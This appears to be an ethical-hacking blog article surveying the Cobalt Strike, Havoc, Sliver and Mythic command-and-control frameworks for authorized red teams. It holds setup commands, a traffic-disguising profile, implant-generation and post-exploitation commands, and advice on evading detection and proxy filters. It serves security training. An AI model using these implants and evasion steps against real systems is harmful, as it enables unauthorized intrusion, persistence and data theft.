Ethical Hacking #red team#c2 framework#cobalt strike

C2 Frameworks Overview: Cobalt Strike, Havoc, Sliver & Mythic

Overview of Command and Control frameworks for authorized red teams: Cobalt Strike, Havoc, Sliver, and Mythic. Architecture, features, and use cases.

April 19, 2026 7 min read

Command and Control (C2) frameworks are the operational backbone of authorized red team engagements. They provide post-exploitation management: deploying agents (implants) on compromised systems, issuing commands, exfiltrating data, maintaining persistence, and pivoting through internal networks — all through an encrypted, resilient communication channel. This article provides a technical overview of the four most widely used C2 frameworks in professional red team operations: Cobalt Strike, Havoc, Sliver, and Mythic.

Authorization is mandatory. C2 infrastructure may only be deployed against systems and networks for which you have explicit written authorization. These tools are for professional red teamers, penetration testers, and security researchers conducting authorized engagements. Unauthorized use is a serious criminal offense.

What Is a C2 Framework?

A C2 framework consists of three core components:

Team Server (C2 Server) — The centralized server that operators connect to. It manages agents, hosts payloads, logs activity, and relays commands.
Agent/Implant — A piece of software deployed on the compromised target. It checks in with the team server at regular intervals to receive and execute commands.
Operator Interface — The UI or CLI that red team operators use to interact with compromised systems via the team server.

The communication between agent and server uses protocols like HTTPS, DNS, SMB named pipes, or custom protocols to blend with legitimate traffic and evade detection.

C2 Architecture Concepts

Before diving into specific tools, understand these key architectural concepts:

Concept	Description
Beacon/Implant	Agent running on the compromised host
Check-in interval (sleep)	How often the agent polls the server; longer = stealthier
Jitter	Random variance added to sleep interval to avoid detection
Listener	Server-side component awaiting agent connections
Stager	Small initial payload that downloads the full implant
Stageless payload	Full implant in a single file (larger but more reliable)
Redirector	Proxy server between agent and team server for opsec
Malleable C2	Configurable communication profile to mimic legitimate traffic

Cobalt Strike

Cobalt Strike by Fortra (formerly HelpSystems) is the industry-standard commercial C2 framework, originally designed for adversary simulation. It has been used by both red teams and real-world threat actors (cracked versions), which has led to extensive detection coverage — making it both realistic for simulation and challenging to operate stealthily without careful configuration.

Key Features

Beacon — Cobalt Strike’s flagship agent. Supports HTTP, HTTPS, SMB, TCP, and DNS communication channels.
Malleable C2 Profiles — XML configuration files that shape Beacon’s network traffic to mimic legitimate applications (Amazon CloudFront traffic, jQuery requests, etc.)
Aggressor Script — A scripting language for automating post-exploitation tasks and extending the framework
Team Server — Multi-operator support; multiple red teamers can share one engagement
Built-in post-exploitation — Port scanning, credential dumping (via Mimikatz integration), lateral movement, keylogging, screenshots

Basic Setup

# Start the team server
./teamserver [external_ip] [password] [malleable_c2_profile]

# Example
./teamserver 203.0.113.10 "StrongPassword!" amazon.profile

Operators connect via the Cobalt Strike GUI client:

Host: 203.0.113.10
Port: 50050
User: operator
Password: StrongPassword!

Configuring a Listener and Generating a Beacon

Cobalt Strike → Listeners → Add
Choose HTTP or HTTPS, set the listening port and host
Attacks → Packages → Windows EXE (Stageless) to generate a payload
Deliver payload via phishing, exploitation, or physical access

Malleable C2 Profiles

Profiles define how Beacon communicates. A well-crafted profile makes Beacon traffic indistinguishable from normal web browsing:

https-certificate {
    set CN "*.cloudfront.net";
    set O "Amazon.com Inc.";
    set C "US";
}

http-get {
    set uri "/s/ref=nb_sb_noss_1/";
    client {
        header "Accept" "text/html,application/xhtml+xml";
        header "Host" "www.amazon.com";
    }
}

Pricing: ~$5,900/year per operator. Legitimate commercial purchase required.

Detection Considerations

Blue teams extensively monitor for Cobalt Strike indicators:

Default Beacon sleep (60 seconds) and jitter values
Default SSL certificate thumbprints
Named pipe patterns (default: \\\\.\\pipe\\MSSE-*)
Specific in-memory signatures (YARA rules)

Operators must customize profiles, change default pipe names, and use process injection carefully to reduce detection.

Havoc Framework

Havoc is a modern, free, open-source C2 framework written in Go and C. Released in 2022 by C5pider, it was designed as a free alternative to Cobalt Strike with comparable capabilities. It has seen rapid community adoption and active development.

Key Features

Demon — Havoc’s agent. Supports HTTP/S, SMB, and custom protocols
Modern UI — A sleek Qt-based dashboard (GUI) for team operations
Teamserver written in Go — Fast and cross-platform
Extendable — Supports custom agents and modules written in C
OPSEC features — Sleep obfuscation, indirect syscalls, stack spoofing to evade EDR

Installation and Setup

git clone https://github.com/HavocFramework/Havoc
cd Havoc

# Install dependencies (Kali/Debian)
sudo apt install build-essential cmake mingw-w64 nasm golang python3 python3-pip -y

# Build teamserver
cd teamserver
go mod download
go build . -o havoc

# Build client GUI
cd ../client
mkdir build && cd build
cmake ..
make -j4

Start the team server:

./havoc server --profile ./profiles/havoc.yaotl

Connect with the GUI client and create a listener (HTTP/S), then generate a Demon payload.

Why Choose Havoc?

Havoc is an excellent choice for red teams that:

Cannot afford Cobalt Strike licensing
Want to study and understand C2 internals (source is available)
Need to customize the agent’s behavior significantly
Want modern EDR evasion built in from the start

Because Havoc is newer, commercial EDR vendors have less mature detection coverage for it compared to Cobalt Strike — though this gap is closing quickly.

Sliver

Sliver is an open-source C2 framework developed and maintained by BishopFox. Written entirely in Go, it is cross-platform and supports Windows, macOS, and Linux implants out of the box with a strong focus on operational security.

Key Features

Multi-protocol support — mTLS, HTTP/S, DNS, WireGuard as C2 channels
Multiplayer — built-in multi-operator support
Cross-platform implants — generate payloads for Windows, Linux, and macOS
In-memory execution — BOF (Beacon Object File) support for in-process execution
Implant obfuscation — built-in garble support to obfuscate Go binaries at compile time
WireGuard C2 — unique VPN-based C2 channel for stealthy communications

Installation

# One-line installer
curl https://sliver.sh/install | sudo bash

# Or manual build
git clone https://github.com/BishopFox/sliver
cd sliver
make

Start the Sliver server:

sudo sliver-server

Basic Usage

# Inside Sliver console

# Generate an HTTPS implant for Windows
generate --http https://203.0.113.10 --os windows --arch amd64 --save /tmp/implant.exe

# Generate a DNS implant (stealthier)
generate --dns c2.yourdomain.com --os windows --arch amd64

# Start an HTTPS listener
https --lhost 0.0.0.0 --lport 443

# List active sessions
sessions

# Interact with a session
use [session-id]

Post-Exploitation in Sliver

# Inside a session
whoami
ps
netstat
upload /local/file /remote/path
download /remote/file /local/path
execute-assembly /path/to/SharpHound.exe -c All
sideload /path/to/inject.dll

Sliver’s integration with Armory provides a curated list of BOFs and additional tools installable with:

armory install all

Mythic

Mythic is a collaborative, open-source C2 framework developed by SpecterOps (originally by @its_a_feature_). It takes a unique modular approach — the framework itself is agent-agnostic, and agents (called payloads) are installed as separate plugins from the Mythic agent repository.

Architecture

Mythic runs entirely in Docker, making deployment consistent and reproducible:

git clone https://github.com/its-a-feature/Mythic
cd Mythic
sudo ./install_docker_debian.sh
sudo make

Key Concepts

Agents — Installed separately: Apfell (macOS JS), Apollo (Windows .NET), Poseidon (cross-platform Go), Medusa (Python), Thanatos (Rust)
C2 Profiles — Communication channel definitions (HTTP, Websocket, dynamicHTTP), installed as Docker containers
Operators — Multi-user support with role-based access
Callbacks — Active agent sessions
Task Tracking — Every command is logged with status, output, and timestamp for audit trails

Installing Agents

# Inside Mythic console
./mythic-cli install github https://github.com/MythicAgents/Apollo
./mythic-cli install github https://github.com/MythicAgents/Poseidon
./mythic-cli install github https://github.com/MythicC2Profiles/http

Why Mythic?

Best documentation and reporting features in the open-source space
Audit trail — every action is logged for client deliverables
Modular — swap agents and C2 channels without changing the core
Educational — excellent for learning how C2 frameworks work internally
Active development — SpecterOps continuously improves it

Choosing the Right C2 Framework

Scenario	Recommended Framework
Enterprise red team with budget	Cobalt Strike (most realistic simulation)
Budget-conscious red team, Windows focus	Havoc
Multi-platform engagements (Windows/Linux/macOS)	Sliver
Learning C2 internals / educational use	Mythic
Long-term adversary simulation	Cobalt Strike + custom profiles

Operational Security (OPSEC) Fundamentals

Regardless of which framework you use, these principles apply:

Use redirectors — Never expose your team server directly. Route traffic through cloud VPS instances (HTTPS redirectors using Nginx or Apache mod_rewrite rules).
Customize everything — Change all default values: sleep times, pipe names, certificate details, URI paths.
Use legitimate infrastructure — Host redirectors on reputable cloud providers (AWS CloudFront, Azure CDN) to blend with normal traffic.
Categorize your domain — Register domains that are pre-categorized in web filtering databases (financial, tech) to bypass proxy filters.
Monitor your own implant — Know what artifacts your chosen agent leaves on disk and in memory.
Clean up — Remove all persistence, implants, and created accounts at engagement end.

Summary

C2 frameworks are the operational hub of red team engagements, enabling persistent access, lateral movement, and post-exploitation at scale. Cobalt Strike remains the gold standard for enterprise engagements due to its maturity and realism. Havoc and Sliver offer powerful free alternatives with modern EDR evasion. Mythic excels in documentation-heavy engagements and educational contexts. All four are legitimate tools for authorized security professionals — the key word being authorized. Mastering one of these frameworks deeply, along with strong OPSEC practices, is what separates a functional red team from a truly effective one.

#sliver #cobalt strike #c2 framework #red team

// related articles

ethical-hacking CRTP Certification: Active Directory Red Team Guide 8 min read ethical-hacking EternalBlue MS17-010 Explained: Exploit and Defense Guide 7 min read ethical-hacking Evil-WinRM: Windows Remote Management for Pentesters 7 min read